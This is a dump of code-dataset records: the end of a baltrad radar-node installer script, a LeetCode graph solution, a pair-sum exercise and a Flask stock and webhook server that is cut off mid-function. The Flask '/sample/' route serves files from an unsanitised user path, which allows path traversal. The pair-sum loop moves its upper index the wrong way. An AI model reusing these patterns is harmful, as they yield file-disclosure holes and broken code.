\"http://localhost:%s\"%benv.getArg(\"TOMCATPORT\"))\n elif benv.hasArg(\"TOMCATURL\"):\n from urlparse import urlparse\n a = urlparse(benv.getArg(\"TOMCATURL\"))\n if a.port == None:\n raise InstallerException(\"You must specify port in tomcat url\")\n benv.addArg(\"TOMCATPORT\", \"%d\"%a.port)\n else:\n benv.addArg(\"TOMCATPORT\", \"8080\")\n benv.addArg(\"TOMCATURL\", \"http://localhost:%s\"%benv.getArg(\"TOMCATPORT\")) \n \n\ndef parse_buildpsql_argument(arg):\n tokens = arg.split(\",\")\n if len(tokens) == 2:\n psqlinc = tokens[0]\n psqllib = tokens[1]\n elif len(tokens) == 1:\n psqlinc = \"%s/include\"%tokens[0]\n psqllib = \"%s/lib\"%tokens[0]\n else:\n raise InstallerException(\"--with-psql should either be , or \")\n \n if not os.path.isdir(psqlinc):\n raise InstallerException(\"Provided path (%s) does not seem to be be used as an include path.\"%psqlinc)\n if not os.path.isdir(psqllib):\n raise InstallerException(\"Provided path (%s) does not seem to be be used as an lib path.\"%psqllib)\n \n return psqlinc, psqllib\n\nif __name__==\"__main__\":\n import getpass\n optlist = []\n args = []\n try:\n optlist, args = getopt.getopt(sys.argv[1:], '', \n ['prefix=','tprefix=', 'jdkhome=','with-zlib=',\n 'with-psql=','with-bufr', 'with-rave','with-rave-gmap','with-bropo','with-beamb','with-bwrwp',\n 'with-hdfjava=', 'with-freetype=','rebuild=',\n 'with-blas=', 'with-cblas=', 'with-lapack=', 'with-lapacke=',\n 'bdb-pool-max-size=', \"bdb-port=\", \"bdb-uri=\", \"bdb-auth=\", \"bdb-storage=\", \n \"bdb-cache-size=\", \"bdb-fileentry-cache-size=\",\n 'rave-pgf-port=', 'rave-log-port=', \"rave-center-id=\", \"rave-dex-spoe=\",\n 'dbuser=', 'dbpwd=','dbname=','dbhost=','dbport=','keystore=','nodename=',\n 'reinstalldb','excludedb', 'runas=','datadir=','warfile=',\n 'urlrepo=','gitrepo=','offline','enable-netcdf',\n 'print-modules', 'print-config', 'exclude-tomcat', 'recall-last-args',\n 'experimental','no-autostart','subsystems=',\n 'force','tomcatport=','tomcaturl=','tomcatpwd=',\n 'tomcatsecureport=', 'keystoredn=', 'keystorepwd=', 'tomcatfwdports=', 'help'])\n except getopt.GetoptError as e:\n usage(True, e.__str__())\n sys.exit(127)\n \n dorestore = False\n doprintconfig = False\n doprintmodules = False\n \n # First handle help and printouts misc options so that we don't get stuck on\n # any bad configuration properties.\n for o,a in optlist:\n if o == \"--help\":\n usage(False)\n sys.exit(0)\n elif o == \"--print-modules\":\n doprintmodules = True\n elif o == \"--recall-last-args\":\n dorestore = True\n elif o == \"--print-config\":\n doprintconfig = True\n \n env = buildenv()\n if dorestore:\n env.restore()\n \n env.excludeModule(\"RAVE\")\n env.excludeModule(\"RAVE-GMAP\")\n env.excludeModule(\"BROPO\")\n env.excludeModule(\"BBUFR\")\n env.excludeModule(\"BEAMB\")\n env.excludeModule(\"BWRWP\")\n \n reinstalldb=False\n rebuild = []\n experimental_build=False\n py3_enabled=True\n use_ravepy3_repo=True\n subsystems = []\n \n for o, a in optlist:\n if o == \"--prefix\":\n env.addArg(\"PREFIX\", a)\n elif o == \"--tprefix\":\n env.addArg(\"TPREFIX\", a)\n elif o == \"--jdkhome\":\n env.addArg(\"JDKHOME\", a)\n elif o == \"--dbuser\":\n env.addArg(\"DBUSER\", a)\n elif o == \"--dbpwd\":\n env.addArgInternal(\"DBPWD\", a)\n elif o == \"--dbname\":\n env.addArg(\"DBNAME\", a)\n elif o == \"--dbhost\":\n env.addArg(\"DBHOST\", a)\n elif o == \"--dbport\":\n env.addArg(\"DBPORT\", a)\n elif o == \"--nodename\":\n env.addArg(\"NODENAME\", a)\n elif o == \"--keystore\":\n env.addArg(\"KEYSTORE\", a)\n elif o == \"--rebuild\":\n rebuild = a.split(\",\")\n elif o == \"--with-zlib\":\n env.addArg(\"ZLIBARG\", a)\n elif o == \"--with-psql\":\n env.addArg(\"PSQLARG\", a)\n elif o == \"--with-hdfjava\":\n if not os.path.isdir(a):\n print(\"--with-hdfjava must be provided with the root directory of the hdf-java installation\")\n sys.exit(127)\n else:\n env.addArg(\"HDFJAVAHOME\", a)\n elif o == \"--enable-netcdf\":\n env.addArg(\"ENABLE_NETCDF\", True) \n elif o == \"--with-freetype\":\n env.addArg(\"FREETYPE\", a)\n elif o == \"--exclude-tomcat\":\n env.excludeModule(\"TOMCAT\")\n elif o == \"--tomcatport\":\n env.addArg(\"TOMCATPORT\", a)\n elif o == \"--keystorepwd\":\n env.addArgInternal(\"KEYSTORE_PWD\", a)\n elif o == \"--keystoredn\":\n env.addArg(\"KEYSTORE_DN\", a)\n elif o == \"--tomcatsecureport\":\n env.addArg(\"TOMCATSECUREPORT\", a)\n elif o == \"--tomcaturl\":\n env.addArg(\"TOMCATURL\", a)\n elif o == \"--tomcatpwd\":\n env.addArgInternal(\"TOMCATPWD\", a)\n elif o == \"--tomcatfwdports\":\n env.addArg(\"TOMCATFWDPORTS\", a)\n elif o == \"--bdb-pool-max-size\":\n env.addArg(\"BDB_POOL_MAX_SIZE\", a)\n elif o == \"--bdb-port\":\n env.addArg(\"BDB_PORT\", a)\n elif o == \"--bdb-uri\":\n env.addArg(\"BDB_URI\", a)\n elif o == \"--bdb-auth\":\n env.addArg(\"BDB_AUTH\", a)\n elif o == \"--bdb-storage\":\n env.addArg(\"BDB_STORAGE\", a)\n elif o == \"--bdb-cache-size\":\n env.addArg(\"BDB_CACHE_SIZE\", a)\n elif o == \"--bdb-fileentry-cache-size\":\n env.addArg(\"BDB_FILEENTRY_CACHE_SIZE\", a)\n elif o == \"--with-bufr\":\n env.addArg(\"WITH_BBUFR\", True)\n elif o == \"--with-rave\":\n env.addArg(\"WITH_RAVE\", True)\n elif o == \"--rave-pgf-port\":\n env.addArg(\"RAVE_PGF_PORT\", a)\n elif o == \"--rave-log-port\":\n env.addArg(\"RAVE_LOG_PORT\", a)\n elif o == \"--rave-center-id\":\n env.addArg(\"RAVE_CENTER_ID\", a)\n elif o == \"--rave-dex-spoe\":\n env.addArg(\"RAVE_DEX_SPOE\", a)\n elif o == \"--with-rave-gmap\":\n env.addArg(\"WITH_RAVE_GMAP\", True)\n elif o == \"--with-bropo\":\n env.addArg(\"WITH_BROPO\", True)\n elif o == \"--with-beamb\":\n env.addArg(\"WITH_BEAMB\", True)\n elif o == \"--with-bwrwp\":\n env.addArg(\"WITH_BWRWP\", True)\n elif o == \"--subsystems\":\n subsystems = a.split(\",\")\n elif o == \"--reinstalldb\":\n reinstalldb=True\n env.addArgInternal(\"REINSTALLDB\", True)\n elif o == \"--excludedb\":\n env.addArgInternal(\"EXCLUDEDB\", True)\n elif o == \"--offline\":\n env.addArgInternal(\"INSTALL_OFFLINE\", True)\n elif o == \"--runas\":\n env.addArg(\"RUNASUSER\", a)\n elif o == \"--datadir\":\n env.addArg(\"DATADIR\", a)\n elif o == \"--warfile\":\n env.addArgInternal(\"WARFILE\", a)\n elif o == \"--urlrepo\":\n env.addArg(\"URLREPO\", a)\n elif o == \"--gitrepo\":\n env.addArg(\"GITREPO\", a)\n elif o == \"--with-blas\":\n env.addArg(\"BLASARG\", a)\n elif o == \"--with-cblas\":\n env.addArg(\"CBLASARG\", a)\n elif o == \"--with-lapack\":\n env.addArg(\"LAPACKARG\", a)\n elif o == \"--with-lapacke\":\n env.addArg(\"LAPACKEARG\", a)\n elif o == \"--no-autostart\":\n env.addArgInternal(\"NO_AUTOSTART\", True)\n elif o == \"--help\":\n pass\n elif o == \"--print-modules\":\n pass\n elif o == \"--print-config\":\n pass\n elif o == \"--recall-last-args\":\n pass\n elif o == \"--experimental\":\n experimental_build = True\n else:\n usage(True, \"Unsupported argument: %s\"%o)\n sys.exit(127)\n\n checkpwd = False\n # We don't want to force a tomcat pwd to be specified unless we are installing something\n # that needs tomcat.\n if len(subsystems) == 0 or \"DEX\" in subsystems:\n if args != None and len(args) > 0 and args[0] in [\"install\",\"check\"]:\n checkpwd = True\n\n if checkpwd and not env.hasArg(\"TOMCATPWD\"):\n print(\"--tomcatpwd not specified, please specify password.\")\n pwd = None\n while pwd == None:\n pwd1 = raw_input(\"Enter password: \")\n pwd2 = raw_input(\"Again: \")\n if pwd1 == pwd2:\n pwd = pwd1\n else:\n print(\"Passwords not matching\")\n env.addArgInternal(\"TOMCATPWD\", pwd)\n\n if checkpwd:\n if not env.hasArg(\"KEYSTORE_PWD\"):\n print(\"--keystorepwd not specified, using tomcatpwd.\")\n env.addArgInternal(\"KEYSTORE_PWD\", env.getArg(\"TOMCATPWD\"))\n\n #Verify FWD ports if defined\n if env.hasArg(\"TOMCATFWDPORTS\"):\n validate_fwdports(env.getArg(\"TOMCATFWDPORTS\"))\n\n # set defaults for whatever arguments we didn't get from the user\n env.addUniqueArg(\"PREFIX\", \"/opt/baltrad\")\n env.addUniqueArg(\"TPREFIX\", env.expandArgs(\"${PREFIX}/third_party\"))\n env.addUniqueArg(\"URLREPO\", \"http://ni.baltrad.eu\")\n env.addUniqueArg(\"GITREPO\", \"https://github.com/baltrad\")\n env.addUniqueArg(\"HDFJAVAHOME\", env.expandArgs(\"${TPREFIX}/hdf-java\"))\n env.addUniqueArg(\"DBUSER\", \"baltrad\")\n env.addUniqueArgInternal(\"DBPWD\", \"baltrad\")\n env.addUniqueArg(\"DBNAME\", \"baltrad\")\n env.addUniqueArg(\"DBHOST\", \"127.0.0.1\")\n env.addUniqueArg(\"DBPORT\", \"5432\")\n env.addUniqueArg(\"RUNASUSER\", getpass.getuser())\n env.addUniqueArg(\"KEYSTORE\", env.expandArgs(\"${PREFIX}/etc/bltnode-keys\"))\n env.addUniqueArg(\"KEYSTORE_DN\", \"yes\")\n env.addUniqueArg(\"ENABLE_NETCDF\", False)\n\n env.addArg(\"ENABLE_PY3\", True)\n\n if not env.hasArg(\"NODENAME\"):\n import socket\n nodename = socket.gethostname()\n print(\"NODENAME WASN'T SPECIFIED, DEFAULTING TO: %s\"%nodename)\n env.addArg(\"NODENAME\", nodename)\n \n #\n # We must ensure that the tomcatport and tomcaturl port is not conflicting\n # and that the tomcat arguments always are there.\n #\n handle_tomcat_arguments(env)\n env.addUniqueArg(\"TOMCATSECUREPORT\", \"8443\")\n \n env.addUniqueArg(\"BDB_POOL_MAX_SIZE\", \"10\")\n env.addUniqueArg(\"BDB_PORT\", \"8090\")\n env.addUniqueArg(\"BDB_AUTH\", \"keyczar\")\n env.addUniqueArg(\"BDB_STORAGE\", \"db\")\n env.addUniqueArg(\"BDB_CACHE_SIZE\", \"5000\")\n env.addUniqueArg(\"BDB_FILEENTRY_CACHE_SIZE\", \"500\")\n env.addUniqueArg(\"RAVE_PGF_PORT\", \"8085\")\n env.addUniqueArg(\"RAVE_LOG_PORT\", \"8089\")\n env.addUniqueArg(\"RAVE_CENTER_ID\", \"82\")\n env.addUniqueArg(\"RAVE_DEX_SPOE\", env.expandArgs(\"localhost:${TOMCATPORT}\"))\n \n modules = MODULES\n \n #\n # If we are running in experimental mode, then mark all affected installers with\n # that information.\n #\n for m in modules:\n if experimental and isinstance(m, experimental):\n m.setExperimentalMode(True)\n if isinstance(m, pychoiceinstaller):\n m.enablePython3(True) # We don't allow anything but python3 any longer.\n if isinstance(m.package(), rave_package):\n m.package().enablePython3(True) # We don't allow anything but python3 any longer.\n\n #sys.exit(0)\n #\n # We want to ensure that user understands that it is nessecary to specify\n # --bdb-uri when installing subsystem depending on BDB\n #\n if len(subsystems) > 0 and args[0] != \"clean\":\n if (\"RAVE\" in subsystems or \"DEX\" in subsystems) and \"BDB\" not in subsystems:\n if not env.hasArg(\"BDB_URI\"):\n raise InstallerException(\"Trying to install subsystem dependant on BDB without providing --bdb-uri\")\n \n #\n # We might only want to install specific subsystems\n #\n if len(subsystems) > 0:\n modules = filter_subsystems(modules, subsystems)\n else:\n subsystems = VALID_SUBSYSTEMS;\n \n env.addArgInternal(\"SUBSYSTEMS\", subsystems)\n\n #\n # Print the configuration settings\n #\n if doprintconfig or doprintmodules:\n if doprintconfig:\n print(\"CONFIGURATION PARAMETERS\")\n print_arguments(env)\n print(\"\")\n if doprintmodules:\n print(\"MODULES\")\n print_modules(env, modules)\n print(\"\")\n \n if len(args) == 0:\n sys.exit(0)\n \n env.remember() # Remember the previous arguments\n\n if len(args) != 1:\n usage(True, \"You can only specify one command %s\"%str(args))\n sys.exit(127)\n \n if args[0] not in [\"install\", \"check\", \"clean\", \"fetch\", \"dist\"]:\n usage(True, \"Unknown command %s\"%str(args[0]))\n sys.exit(127)\n\n if env.getArg(\"ENABLE_NETCDF\") == False:\n env.excludeModule(\"NETCDF\")\n\n if env.hasArg(\"WITH_BBUFR\") and env.getArg(\"WITH_BBUFR\") == True:\n env.removeExclude(\"BBUFR\")\n\n if env.hasArg(\"WITH_RAVE\") and env.getArg(\"WITH_RAVE\") == True:\n env.removeExclude(\"RAVE\")\n\n if env.hasArg(\"WITH_RAVE_GMAP\") and env.getArg(\"WITH_RAVE_GMAP\") == True:\n env.removeExclude(\"RAVE\")\n env.removeExclude(\"RAVE-GMAP\")\n\n if env.hasArg(\"WITH_BROPO\") and env.getArg(\"WITH_BROPO\") == True:\n env.removeExclude(\"RAVE\")\n env.removeExclude(\"BROPO\")\n \n if env.hasArg(\"WITH_BEAMB\") and env.getArg(\"WITH_BEAMB\") == True:\n env.removeExclude(\"RAVE\")\n env.removeExclude(\"BEAMB\")\n \n if env.hasArg(\"WITH_BWRWP\") and env.getArg(\"WITH_BWRWP\") == True:\n env.removeExclude(\"RAVE\")\n env.removeExclude(\"BWRWP\")\n \n # Freetype is not an actual module, it's just an indicator when building\n # PIL\n if env.hasArg(\"FREETYPE\"):\n verify_buildfreetype_argument(env.getArg(\"FREETYPE\"))\n \n if env.hasArg(\"ZLIBARG\"):\n buildzlib, zinc, zlib = parse_buildzlib_argument(env.getArg(\"ZLIBARG\"))\n env.addArgInternal(\"ZLIBINC\", zinc)\n env.addArgInternal(\"ZLIBLIB\", zlib)\n if buildzlib == False:\n env.excludeModule(\"ZLIB\")\n \n if env.hasArg(\"PSQLARG\"):\n psqlinc, psqllib = parse_buildpsql_argument(env.getArg(\"PSQLARG\"))\n env.addArgInternal(\"PSQLINC\", psqlinc)\n env.addArgInternal(\"PSQLLIB\", psqllib)\n\n validators = []\n if \"BDB\" in subsystems or \"DEX\" in subsystems:\n validators.append(psqlvalidator())\n validators.append(jdkvalidator())\n validators.append(zlibvalidator())\n validators.append(doxygenvalidator())\n \n if args[0] in [\"install\", \"check\"]:\n for validator in validators:\n validator.validate(env)\n\n if not env.hasArg(\"JDKHOME\"):\n print(\"You must specify --jdkhome=... when installing the node\")\n sys.exit(127)\n\n # bdb storage needs a data directory \n if not env.hasArg(\"DATADIR\"):\n env.addArg(\"DATADIR\", env.expandArgs(\"$PREFIX/bdb_storage\"))\n\n if args[0] in [\"install\"]:\n # Setup the general ld library path that will be the one pointing out\n # all relevant libraries when the system has been installed\n #\n ldpath = \"$TPREFIX/lib\"\n ldpath = \"$HDFJAVAHOME/lib/linux:%s\"%ldpath\n ldpath = \"%s:$PREFIX/hlhdf/lib\"%ldpath\n if not env.isExcluded(\"BBUFR\"):\n ldpath = \"%s:$PREFIX/bbufr/lib\"%ldpath\n ldpath = \"%s:$PREFIX/baltrad-db/lib\"%ldpath\n ldpath = \"%s:$PREFIX/lib\"%ldpath\n if env.hasArg(\"PSQLLIB\") and env.getArg(\"PSQLLIB\") != None:\n ldpath = \"%s:$PSQLLIB\"%ldpath\n if env.hasArg(\"ZLIBLIB\") and env.getArg(\"ZLIBLIB\") != None:\n ldpath = \"%s:$ZLIBLIB\"%ldpath\n \n env.setLdLibraryPath(\"%s:$$LD_LIBRARY_PATH\"%ldpath)\n\n # And setup the path as well\n pth=\"$TPREFIX/bin\"\n pth=\"%s:$PREFIX/bin\"%pth\n pth=\"%s:$PREFIX/hlhdf/bin\"%pth\n pth=\"%s:$PREFIX/beast/bin\"%pth\n pth=\"%s:$PREFIX/baltrad-db/bin\"%pth\n\n env.setPath(\"%s:$$PATH\"%pth)\n\n # We want to wrap everything up in some scripts\n # so that we can stop/start the node\n spath = pth\n sldpath = ldpath\n \n if not env.isExcluded(\"BEAMB\"):\n sldpath = \"$PREFIX/beamb/lib:%s\"%sldpath\n\n if not env.isExcluded(\"BROPO\"):\n sldpath = \"$PREFIX/bropo/lib:%s\"%sldpath\n spath = env.expandArgs(\"$PREFIX/bropo/bin:%s\"%spath)\n\n if not env.isExcluded(\"BWRWP\"):\n sldpath = \"$PREFIX/baltrad-wrwp/lib:%s\"%sldpath\n spath = env.expandArgs(\"$PREFIX/baltrad-wrwp/bin:%s\"%spath)\n \n if not env.isExcluded(\"RAVE\"):\n sldpath = \"$PREFIX/rave/lib:%s\"%sldpath\n spath = env.expandArgs(\"$PREFIX/rave/bin:%s\"%spath)\n\n script = nodescripts(\n \"%s\"%spath,\n \"%s\"%sldpath,\n \"1.0.0\",\n raveinstalled=not env.isExcluded(\"RAVE\"),\n subsystems=subsystems\n )\n\n script.create_scripts(env)\n env.setNodeScript(script)\n\n # Set the installer path\n env.setInstallerPath(os.path.dirname(os.path.dirname(os.path.realpath(sys.argv[0]))))\n\n if args[0] in [\"install\"]:\n if reinstalldb == True:\n if not \"DBINSTALL\" in rebuild:\n rebuild.append(\"DBINSTALL\")\n\n ni = node_installer(modules, rebuild)\n if args[0] == \"install\":\n ni.install(env)\n elif args[0] == \"check\":\n pass\n elif args[0] == \"clean\":\n ni.clean(env)\n elif args[0] == \"fetch\":\n ni.fetch_offline_content(env)\n elif args[0] == \"dist\":\n ni.create_offline_tarball(env)\n","repo_name":"baltrad/node-installer","sub_path":"bin/install.py","file_name":"install.py","file_ext":"py","file_size_in_byte":45692,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"31"} +{"seq_id":"44037078765","text":"\"\"\"\nThere are n computers numbered from 0 to n - 1 connected by ethernet cables connections forming a network where connections[i] = [ai, bi] represents a connection between computers ai and bi. Any computer can reach any other computer directly or indirectly through the network.\nYou are given an initial computer network connections. You can extract certain cables between two directly connected computers, and place them between any pair of disconnected computers to make them directly connected.\nReturn the minimum number of times you need to do this in order to make all the computers connected. If it is not possible, return -1.\nExample 1:\nInput: n = 4, connections = [[0,1],[0,2],[1,2]]\nOutput: 1\nExplanation: Remove cable between computer 1 and 2 and place between computers 1 and 3.\nExample 2:\nInput: n = 6, connections = [[0,1],[0,2],[0,3],[1,2],[1,3]]\nOutput: 2\nExample 3:\nInput: n = 6, connections = [[0,1],[0,2],[0,3],[1,2]]\nOutput: -1\nExplanation: There are not enough cables.\n\"\"\"\n\n\"\"\"\nI thought I could just use a process of elimnation and use a single pass ; if a BOTH in a visited pair have been visited before then I have an additional cable to use and the number of unconnected computers left will be the number of cables I needed -1. this does not take into account however that a disconnected computer does not have to be in isolation , it can be disconnected from other computers. as such the solution I finally came up with was this. intitalise an object with a node as the key and array as value. for every pair value append the opposite value to the object key to signify it is connected. then have a visited array of lnegth n. after this use depth first search on each key in the object. if its possible to visit every node on the first go then return the number needed -1 to represent 1 cable mapping to two computers.\n\"\"\"\n\ndef makeConnected(n,connections):\n\n \n if len(connections) < n-1 :\n return -1\n visited = [0] * n\n \n\n theobject = {}\n for x in range(n):\n theobject[x] = [] \n for i in range(len(connections)):\n\n if connections[i][0] not in theobject[connections[i][1]]:\n theobject[connections[i][1]].append(connections[i][0])\n \n if connections[i][1] not in theobject[connections[i][0]]:\n theobject[connections[i][0]].append(connections[i][1])\n \n numberneeded = 0\n\n def dfs(i,visited):\n if visited[i]== 0:\n visited[i] = 1\n for j in range(len(theobject[i])):\n if visited[theobject[i][j]] == 0:\n dfs(theobject[i][j],visited)\n\n for i in range(len(visited)):\n if visited[i] == 0:\n dfs(i,visited)\n numberneeded+=1\n return numberneeded-1","repo_name":"AlexeiVartoumian/leetcodeRepository","sub_path":"Graph/number of operations to make network connected.py","file_name":"number of operations to make network connected.py","file_ext":"py","file_size_in_byte":2854,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"31"} +{"seq_id":"41498929266","text":"#lst=[4,3,2,1]\n#read a element in console\n#print pairs of elements\n\n\n#6\n\nlst=[4,3,2,1]\nread=int(input(\"enter a number\"))\nlst.sort()\nlow=0\nupp=len(lst)-1\nwhile(low<=upp):\n data=lst[low]+lst[upp]\n if(data==read):\n print(\"pairs are\",lst[low],lst[upp])\n break\n elif(data>read):\n upp=upp+1\n else:\n low=low+1\n","repo_name":"jitheshlaledk/python","sub_path":"collections/list/list13.py","file_name":"list13.py","file_ext":"py","file_size_in_byte":343,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"31"} +{"seq_id":"42682687890","text":"# 解決CORS不能瀏覽的方法\n# https://blog.gtwang.org/web-development/chrome-configuration-for-access-control-allow-origin/\n\nimport json\nfrom flask import Flask, request, abort, send_file, render_template, url_for\nfrom datetime import datetime,timedelta\nfrom dbhelper import DbHelper\nfrom myquery import MyRequest\n\n\nimport socket\nimport requests.packages.urllib3.util.connection as urllib3_cn\n\nfrom flask_cors import CORS\n\nimport os\n\napp = Flask(__name__)\nCORS(app)\n\ndef WriteData(message,symbol):\n db = DbHelper('tradingview.db','ALERTMESSAGE')\n\n if not db.IsInit():\n db.CreateAlertMessage()\n db.InitAlertMessage()\n \n idx = db.GetID()\n \n db.WriteAlertMessage(idx + 1, message, symbol, datetime.now())\n \ndef WriteThreeBig(unit, buy, sell, diff, date):\n db = DbHelper('tradingview.db','THREE_BIG')\n \n if not db.IsInit():\n db.CreateThreeBig()\n db.InitThreeBig()\n \n idx = db.GetID()\n \n db.WriteThreeBig(idx + 1, unit, buy, sell, diff, date, datetime.now())\n \ndef CheckCurrentMonthData(date):\n db = DbHelper('tradingview.db','THREE_BIG')\n \n endDate = datetime.strptime(date, '%Y%m%d')\n startDate = endDate + timedelta(days=-endDate.day+1)\n \n print(startDate,endDate)\n \n emptydays = db.CheckSelfBusinessTradeBySelf(startDate.strftime('%Y%m%d'), endDate.strftime('%Y%m%d'))\n \n print(emptydays)\n \n return emptydays\n\ndef ReadThreeBigByMonth(date):\n db = DbHelper('tradingview.db','THREE_BIG')\n \n endDate = datetime.strptime(date, '%Y%m%d')\n startDate = endDate + timedelta(days=-endDate.day+1)\n \n return db.ReadSelfBusinessTradeBySelf(startDate.strftime('%Y%m%d'), endDate.strftime('%Y%m%d'))\n\n\n@app.route('/')\ndef hello_world():\n return '

    Service is online!

    '\n\n# @app.route('/favicon.ico/')\n# def favicon():\n \n# return\n \n\n@app.route('/sample/',defaults={'req_path': ''})\n@app.route('/sample/')\ndef index(req_path):\n BASE_DIR = '..\\\\stock_tracking_system\\\\project'\n\n print(req_path)\n\n if not req_path:\n req_path = 'index.html'\n\n # Joining the base and the requested path\n abs_path = os.path.join(BASE_DIR, req_path)\n\n # Return 404 if path doesn't exist\n if not os.path.exists(abs_path):\n return abort(404)\n\n # Check if path is a file and serve\n if os.path.isfile(abs_path):\n return send_file(abs_path)\n\n # Show directory contents\n files = os.listdir(abs_path)\n return render_template('index.html', files=files)\n\n\n\n# @app.route('/', defaults={'req_path': ''})\n# @app.route('/sample/')\n# def dir_listing(req_path):\n# BASE_DIR = 'C:/Users/purem/Desktop/stock_tracking_system/project'\n\n# # Joining the base and the requested path\n# abs_path = os.path.join(BASE_DIR, req_path)\n\n# # Return 404 if path doesn't exist\n# if not os.path.exists(abs_path):\n# return abort(404)\n\n# # Check if path is a file and serve\n# if os.path.isfile(abs_path):\n# return send_file(abs_path)\n\n# # Show directory contents\n# files = os.listdir(abs_path)\n# return render_template('index.html', files=files)\n\n@app.route('/.well-known/pki-validation/B87B968F8367A7B79753D5221B1BFDD0.txt')\ndef identify():\n with open('C:\\SSL_TOOL\\key\\B87B968F8367A7B79753D5221B1BFDD0.txt') as f:\n lines = f.read()\n print(lines)\n return lines\n\n@app.route('/stock-sample')\ndef stockapp():\n with open('C:/Users/purem/Desktop/stock_tracking_system/project/index.html') as f:\n lines = f.read()\n print(lines)\n return\n\n@app.route('/signal_us500')\ndef getSignalUs500():\n db = DbHelper('tradingview.db','ALERTMESSAGE')\n signal = db.ReadUs500()\n print(signal)\n return signal\n\n@app.route('/login', methods=[\"POST\"])\ndef login():\n return \"OK!\"\n\n@app.route('/stockInfo', methods=['POST'])\ndef stockInfo():\n print(\"--request start--\")\n print(request)\n print(request.data)\n print(\"--request end--\")\n \n req = json.loads(request.data)\n \n print(req,req['stockCode'],req['time'])\n \n feedback = MyRequest(req['time'],req['stockCode'])\n \n response = feedback.GetStockInfo()\n \n print(response)\n return json.dumps(response) \n # return \"OK!\"\n\n@app.route('/stockInfoV2', methods=['POST'])\ndef stockInfoV2():\n print(\"--request start--\")\n print(request)\n print(request.data)\n print(\"--request end--\")\n \n req = json.loads(request.data)\n \n print(req,req['stockCode'],req['time'])\n \n feedback = MyRequest(req['time'],req['stockCode'])\n \n response = feedback.GetStockInfoV2()\n \n print(response)\n return json.dumps(response) \n\n@app.route('/threeBig', methods=['POST'])\ndef threeBig():\n print(\"--request start--\")\n print(request)\n print(request.data)\n print(\"--request end--\")\n \n req = json.loads(request.data)\n \n print(req,req['stockCode'],req['time'])\n \n feedback = MyRequest(req['time'],req['stockCode'])\n \n response = feedback.GetThreeBig()\n \n print(response) \n return response\n\n@app.route('/threeBigMonth', methods=['POST'])\ndef threeBigMonth():\n print(\"--request start--\")\n print(request)\n print(request.json)\n print(\"--request end--\")\n\n req = request.json\n \n # 檢查日期當月資料是否都有\n checkResult = CheckCurrentMonthData(req['time'])\n # print(checkResult)\n # 如果有日期,表示該日期有缺資料\n \n # print('checking data')\n \n if len(checkResult) != 0:\n feedback = MyRequest(req['time'],req['stockCode'])\n # response = feedback.GetThreeBig()\n # print(response)\n \n for i in checkResult:\n # print(\"---\",i,\"---\")\n feedback.date = i\n response = feedback.GetThreeBig()\n # print(response) \n # print(\"----write data----\")\n \n datas = response['data']\n \n for row in datas:\n # print(row[0],row[1],row[2],row[3],response['date'])\n WriteThreeBig(row[0],row[1],row[2],row[3],response['date'])\n \n \n # print(\"----write data complete----\") \n # print(\"---\",i,\"complete\",\"---\")\n \n\n # print('checking data complete')\n return json.dumps(ReadThreeBigByMonth(req['time']))\n \n\n@app.route('/webhook_bitcoin', methods=['POST'])\ndef webhook_bitcoin():\n print(\"--request start--\")\n print(request)\n print(request.data)\n print(\"--request end--\")\n \n data = request.data.decode('utf-8')\n print(data)\n WriteData(data, 'bitcoin')\n \n return \"OK!\"\n \n@app.route('/webhook_us500_d1', methods=['POST'])\ndef webhook_us500_d1():\n print(\"--request start--\")\n print(request)\n print(request.data)\n print(\"--request end--\")\n \n data = request.data.decode('utf-8')\n print(data)\n WriteData(data, 'us500_d1')\n \n return \"OK!\"\n\n@app.route('/webhook_us500_h4', methods=['POST'])\ndef webhook_us500_h4():\n print(\"--request start--\")\n print(request)\n print(request.data)\n print(\"--request end--\")\n \n data = request.data.decode('utf-8')\n print(data)\n WriteData(data, 'us500_h4')\n \n return \"OK!\"\n \n@app.route('/webhook_us500_h2', methods=['POST'])\ndef webhook_us500_h2():\n print(\"--request start--\")\n print(request)\n print(request.data)\n print(\"--request end--\")\n \n data = request.data.decode('utf-8')\n print(data)\n WriteData(data, 'us500_h2')\n \n return \"OK!\"\n\n@app.route('/webhook_us500_h1', methods=['POST'])\ndef webhook_us500_h1():\n print(\"--request start--\")\n print(request)\n print(request.data)\n print(\"--request end--\")\n \n data = request.data.decode('utf-8')\n print(data)\n WriteData(data, 'us500_h1')\n \n return \"OK!\"\n \n@app.route('/webhook_us500_m5', methods=['POST'])\ndef webhook_us500_m5():\n print(\"--request start--\")\n print(request)\n print(request.data)\n print(\"--request end--\")\n \n data = request.data.decode('utf-8')\n print(data)\n WriteData(data, 'us500_m5')\n \n return \"OK!\"\n\n@app.route('/webhook_us500_m5_2', methods=['POST'])\ndef webhook_us500_m5_2():\n print(\"--request start--\")\n print(request)\n print(request.data)\n print(\"--request end--\")\n \n data = request.data.decode('utf-8')\n print(data)\n WriteData(data, 'us500_m5_2')\n \n return \"OK!\"\n\n@app.route('/webhook_nas100_d1', methods=['POST'])\ndef webhook_nas100_d1():\n print(\"--request start--\")\n print(request)\n print(request.data)\n print(\"--request end--\")\n \n data = request.data.decode('utf-8')\n print(data)\n WriteData(data, 'nas100_d1')\n \n return \"OK!\"\n\n@app.route('/webhook_nas100_h4', methods=['POST'])\ndef webhook_nas100_h4():\n print(\"--request start--\")\n print(request)\n print(request.data)\n print(\"--request end--\")\n \n data = request.data.decode('utf-8')\n print(data)\n WriteData(data, 'nas100_h4')\n \n return \"OK!\"\n\n@app.route('/webhook_nas100_h2', methods=['POST'])\ndef webhook_nas100_h2():\n print(\"--request start--\")\n print(request)\n print(request.data)\n print(\"--request end--\")\n \n data = request.data.decode('utf-8')\n print(data)\n WriteData(data, 'nas100_h2')\n \n return \"OK!\"\n\n@app.route('/webhook_nas100_h1', methods=['POST'])\ndef webhook_nas100_h1():\n print(\"--request start--\")\n print(request)\n print(request.data)\n print(\"--request end--\")\n \n data = request.data.decode('utf-8')\n print(data)\n WriteData(data, 'nas100_h1')\n \n return \"OK!\"\n\n@app.route('/webhook_qqq_d2', methods=['POST'])\ndef webhook_qqq_d2():\n print(\"--request start--\")\n print(request)\n print(request.data)\n print(\"--request end--\")\n \n data = request.data.decode('utf-8')\n print(data)\n WriteData(data, 'qqq_d2')\n \n return \"OK!\"\n\n@app.route('/webhook_qqq_d1', methods=['POST'])\ndef webhook_qqq_d1():\n print(\"--request start--\")\n print(request)\n print(request.data)\n print(\"--request end--\")\n \n data = 